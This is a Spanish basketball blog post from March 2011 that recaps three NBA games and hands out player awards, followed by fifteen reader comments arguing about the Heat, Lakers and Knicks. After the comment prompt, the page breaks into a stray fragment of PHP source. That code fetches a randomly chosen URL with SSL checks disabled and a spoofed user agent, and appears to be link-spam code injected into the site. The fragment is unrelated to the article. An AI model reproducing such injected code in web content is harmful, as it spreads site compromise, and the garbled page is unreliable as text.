La Crónica (10/03/2011)

11 de March de 2011 por TheDeerHunter

No estaban muertos… Estaban de parranda!!!

En los albores de la tempestad los Heat lograron una victoria desesperada contra los Lakers. Ya se sabe que pasa cuando suena una ratificación de un entrenador. La antesala de la destitución, dicen. Según Riley el puesto de Spoelstra no peligraba con el resultado del decisivo choque. Por si las moscas el resultado vino bien para devolverle la camisa al cuerpo.

Los Heat salieron a morir a la cancha y ya se sabe que los Lakers tienen poco afán de mojar la camiseta por un simple partido de regular y cierta tendencia a hacer amigos. Se llevó el gato al agua el que más hambre tenía y, oh noticia, el que mejor decidió en el último minuto y medio tras una igualdad máxima (88-94).

Partido atípico, tanto como para que Bosh sea el líder anotador de su equipo o que los Heat se lleven el balance reboteador. Por ahí Gasol podría haber dicho algunas cosas más, pero no lo hizo. Y Kobe quiso dar algunas lecciones de resolución en el filo de la navaja pero lo que dio es el mejor ejemplo de cómo no afrontar esos momentos. Una fatal pérdida y alguna que otra mandarina condenaron a los suyos. Aún así todo pudo cambiar con un increíble fallo bajo canasta de Artest y la aún más increíble decisión arbitral de no señalar nada en esa jugada. Con este resultado los Heat pueden respirar un poquito.

Después los Nuggets ganaron por primera vez en Phoenix desde hace 13 años (116-97). George Karl no lo hacía desde que ganó con los Sonics en 1997. Ya ha llovido un poco. Su ilusionante nuevo proyecto ha obrado el milagro que no lograron las más fastuosas versiones de  los  últimos Nuggets con Melo, Iverson o Billups. Ty Lawson brilló amargándole la noche a Nash. Vince volvía por sus (peores) fueros y los Suns dan un paso atrás importante en sus aspiraciones. El mejor fue Gortat, por cierto.

Para celebrarlo Carmelo y sus Knicks se llevaron un buen palizón de Dallas (109-127). El equipo de D’Antoni jugó bien en ataque, con un Stoudemire sensacional… pero en defensa dieron todo menos miedo. Los Mavs logran recuperar la ventaja contra los amarillos que habían perdido estos días.

PREMIOS

MVP: La salida de Chauncey Billups ha dejado las puertas abiertas de par en par a Ty Lawson. Ante los Suns fue el mejor de su equipo con 20 puntos, 11 asistencias y 4 robos. Ya pueden empezar a buscar un trade por Raymond Felton.

Rookie: Tras un pequeño bache, vuelve con fuerza Landry Fields. 19 puntos, 6 rebotes y 4 robos para el robo del draft.

Sorpresa: Nos alegramos del buen papel de Rodrigue Beabouis tras su grave lesión. Anoche colaboró en la victoria de su equipo con 14 puntos y 6 asistencias.

Decepción: Desde su vuelta a los Knicks, Jared Jeffries ha anotado un total de 5 puntos en otros tantos partidos… Sólo ha sido capaz de anotar 2 canastas en juego en más de 120 minutos. Escalofriante.

Esfuerzo en vano: A pesar de sus 36 puntos y 7 rebotes, Amare Stoudamire no pudo hacer nada para evitar que los Mavs les pasaran por encima.

Imágenes | AP Photos / Getty Images

Comenta

15 comentarios a esta entrada

  1. Txusma dice:
    #1

    Lo primer que me ha venido a la cabeza al ver el resultado ha sido Sheldon Cooper diciendo: “Zas! Es toda la boca!!” 😀 😀

    Y par favor, cuando se acaba esto de “Los Heat” o “Los Mavs”? Es horrible!

      Citar

  2. Denise dice:
    #2

    🙂 pues si, un buen zas.
    Es que los enterrais muy pronto, con el Big Three funcionando y otros jugadores aportando como Mike Miller, este equipo puede hacer algo importante.
    No sé si los Lakers habrán puesto todas sus cartas sobre la mesa, pero demasiados poco balones dentro teniendo en cuenta la fragilidad de la zona de Miami.
    ¿Quién es más malo Jeffries o Dampier?
    Con el temporadón que estaba haciendo Felton, y de momento no pilla el juego con los Nuggets. A Mozgov tampoco le están dando mucha bola.
    Yo creo que los Knicks ni se clasificarian para playoffs si jugasen en el Oeste.

      Citar

  3. TheDeerHunter dice:
    #3

    Pues no, para nada ha sido un zas.
    Dije que si ganaban aún tendrían alguna posibilidad de reengancharse a las opciones del anillo pero que si perdían iban a estar CASI enterrados.
    Han ganado pero para mí la frase no pierde ni un mínimo de vigencia.

    Me parece más importante para los Heat la lesión de Boozer que el resultado de anoche, fíjate lo que te digo. Con ese juego a mí me parece ahora mismo ciencia ficción pensar que pueden tumbar a los Celtics con desventaja campo (algo parecido me pasa con los Lakers, ojo)

    Al tiempo…

    PD: Eso sí… vislumbrar victoria en un partido igualado con la que estaba cayendo tiene su mérito, Denise. Aunque no me gustaría recordarte lo que dijiste de la selección de futbol poco antes del mundial. ;D

      Citar

  4. TheDeerHunter dice:
    #4

    Ah… y el MVP de los Heat anoche no fueron ni LeBron, ni Wade, ni Bosh. Fue otro que no metió ni una sola canasta en todo el partido.

      Citar

  5. Denise dice:
    #5

    Si es un zas en toda la boca, en el Staples, los Heat humillaron a los Lakers, y ahora, que venían de 5 derrotas consecutivas, y los Lakers de 8 victorias, le han vuelto a ganar.
    Me alegro especialmente por Phil Jackson, un buen zas para él, riendose de los lloros de Bosh.
    No me acuerdo que dije de la selección, pero si ahoras nos ponemos a echar cosas en cara….no soy adivino, al menos me mojo.
    A quien te refieres con el MVP…a los arbitros?
    PD: Si alguien tiene el movil de Riley, le propongo con los ojos cerrados un trade Bosh por cualquier jugador de los Magic excepto Howard y Nelson.

      Citar

  6. Vader dice:
    #6

    Llorarian ayer pero de alegria los heatles?? XD

    Muchos Mavs para lo que hoy es NY y mas sin Billups. Huele un poco que le teneis ganas a los Knicks y parece que os alegrais de sus derrotas… Pobrecillos, Melo os acabara convenciendo igual que Stat al que muchos infravalorabais al comienzo del curso. Como consigamos a CP3 el big three de NY sera mejor que el Miami, por un tema de compatibilidades… al tiempo.

    Venga, ya he flameado un poco… XD

    Saludos

      Citar

  7. Denise dice:
    #7

    @vader: si fichan a Chris Paul, pues, menos banquillo todavía, cuando haya algún lesionado, tendrán que salir Jay-Z y Spike Lee a jugar 🙂
    Los Knicks son perdedores por excelencia, y sus negativos lios internos dan mucho juego a la competición. No sería bueno que se convirtieran en un equipo ganador.
    PD: 4-1y K.O. en Primera Ronda 🙂

      Citar

  8. Ru dice:
    #8

    @txusma: pues no sé si lo habrán cambiado pero en la página de la NBA en español hace dos temporadas hablaban de Los Soles de Phoenix y burradas varias…yo por mi salud mental prefiero no volver a entrar xDD

    En el título de los Tar Heels Lawson había sido el jugador más importante del equipo durante el March Madness,al igual que con el bueno de Billups ya había demostrado de lo que era capaz.Ahora el PG titular es suyo y el pobre Felton se ha topado de bruces con un jugador asentado en la disciplina del equipo y con un futuro prometedor por delante.Una pena.

      Citar

  9. Sempren dice:
    #9

    Yo tampoco sé cómo es el asunto con la página en general, pero las pocas noticias que a veces abro desde la página del Facebook de NBA en español, son traducciones hechas con un traductor automático, se nota a la legua, supongo que de ahí vienen “Los Soles” (madre mía) y atrocidades varias.

    Del Lakers@Miami, no me convencieron ninguno de los dos equipos, aunque los Celtics actuales (sin los O’Neal, ni Davis ni Delonte) tampoco demasiado, con esas bajas no veo a ninguno muy superior.

      Citar

  10. Scriers dice:
    #10

    Pues a mí no me pareció un Zas. Los heats salieron a morder y extramotivado y los lakers salieron como toda esta ultima racha. concentrados y basando su juego en el colectivo (aunque los diez primeros puntos fueran de kobe).
    Pero solo habia que ver como celebraban unos y otros los puntos. A mi Bosh me pareció particularmente odioso. gesticulando, teatrerìsimo. me gustó wade y miller, pero poco los heats, me parecieron brutalmente improvisados. contra los bulls me pasó igual.
    en fin, que yo creo que la victoria les hace mas daño que bien, porque se van a creer lo que no es. sin embargo los lakers seguirán ajustando tuercas, y aunque a veces pierdan, salvo el desconcierto de blake el equipo pinta bien con artest y bynum recuperados para la causa.
    por cierto thedeerhunter… no se a quién te refieres perdoname.

      Citar

  11. TheDeerHunter dice:
    #11

    Pues en efecto… el arbitraje como mínimo de los dos últimos minutos es de lo peor que he visto desde las finales.
    Pagaría porque hagan todos los malos ahora y en playoffs se comporten. Al mismo tiempo apostaría lo mismo porque esto no va a suceder ni pagando. Ganaría mucha pasta con la jugada seguro.

    @Denise: Yo también me mojo… ¿o no?

      Citar

  12. Scriers dice:
    #12

    Bueno, pero si no se ponen caseros con los Heats un poco por arriba y cinco derrotas en contra y en temporada regular, ¿Cuando se van a poner? Yo no creo en eso, creo que hay veces que va para un lado y para otro.

    Insisto creo que más allá de la victoria y derrota, la victoria le hace mal a Miami y a los Lakers les deja más o menos igual.

      Citar

  13. Vader dice:
    #13

    @Denise

    ¿Jay-Z? ¿Pero este no era accionista de los Nets? Sacrilegio!!!

      Citar

  14. GreenPride dice:
    #14

    Y los Beach Boys…. no, no espera que han ganado… y a los Lakers!! En fin, lo que son las cosas, un partido en el que LeBron y Wade no se las juegan todas, que incluso van y hacen algun pick and roll para que Bosh pueda conseguir canastas interiores y en el que funciona Miller y van y ganan. Además sus últimos ataques no fueron un LeBron para 5 pero no lancemos campanas al vuelo que ganaron por los pelos y porque Kobe no tuvo su mejor día en los instantes finales. A ver si en los próximos 5 partidos que también son contra equipos buenos refrendan que vuelve a estar finos o se caen de nuevo.
    Los Lakers no jugaron muy allá con pocos balones interiores y no demasiado acierto, sobre todo al final. Lo malo para ellos es que como los Mavs masacraron la nula defensa de los Knicks pues se les alejan a dos partidos. Clave para los de LA ganar en Dallas mañana para seguir optando al segundo puesto de conferencia y no verse en una segunda ronda presumiblemente con Dallas y factor cancha en contra. Interesantísimo partido ése Dallas-LA Lakers

      Citar

  15. max dice:
    #15

    No sé si os acordais, pero Ty Lawson fue drafteado en 2009 por Minnesota en la posición 18 después de haber escogido antes ya a Ricky Rubio (5) y a Jonny Flyn(6), con lo que se quedaron con tres bases de perfil similar. Decisión: enviar a Lawson a Denver a cambio de casi nada (una futura ronda de draft).
    Es muy pronto para hacer valoraciones, pero de entrada parece que la decisión fue un poco precipitada, visto el rendimiento de Lawson, y el de Flynn…..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>